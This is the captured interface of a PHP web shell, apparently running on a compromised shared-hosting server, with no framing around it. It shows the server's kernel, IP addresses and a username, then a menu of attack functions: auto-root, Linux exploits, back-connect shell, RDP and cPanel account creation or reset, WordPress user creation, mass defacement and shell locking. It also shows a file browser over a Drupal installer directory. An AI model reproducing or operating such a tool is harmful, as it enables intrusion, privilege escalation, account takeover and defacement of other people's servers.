Linux br942.hostgator.com.br 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
Apache
: 162.241.2.188 | : 3.135.246.88
Cant Read [ /etc/named.conf ]
8.2.22
manoe678
May The Force Be With You
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
MASS DEFACE
+ Create Folder
+ Create File
/
var /
softaculous /
drupal89 /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
.htaccess
686
B
-rw-r--r--
NOTES.txt
1.95
KB
-rw-r--r--
README.txt
283
B
-rw-r--r--
_htaccess
487
B
-rw-r--r--
clone.php
14.31
KB
-rw-r--r--
edit.php
4.73
KB
-rw-r--r--
edit.xml
433
B
-rw-r--r--
fileindex.php
272
B
-rw-r--r--
import.php
5.45
KB
-rw-r--r--
info.xml
3.92
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
15.08
KB
-rw-r--r--
install.xml
1.1
KB
-rw-r--r--
md5
2.48
KB
-rw-r--r--
settings.php
31.5
KB
-rw-r--r--
upgrade.php
4.38
KB
-rw-r--r--
upgrade.xml
309
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# Deny all requests from Apache 2.4+. <IfModule mod_authz_core.c> Require all denied </IfModule> # Deny all requests from Apache 2.0-2.2. <IfModule !mod_authz_core.c> Deny from all </IfModule> # Turn off all options we don't need. Options -Indexes -ExecCGI -Includes -MultiViews # Set the catch-all handler to prevent scripts from being executed. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2006_006 <Files *> # Override the handler again if we're run later in the evaluation list. SetHandler Drupal_Security_Do_Not_Remove_See_SA_2013_003 </Files> # If we know how to do it safely, disable the PHP engine entirely. <IfModule mod_php7.c> php_flag engine off </IfModule>
Close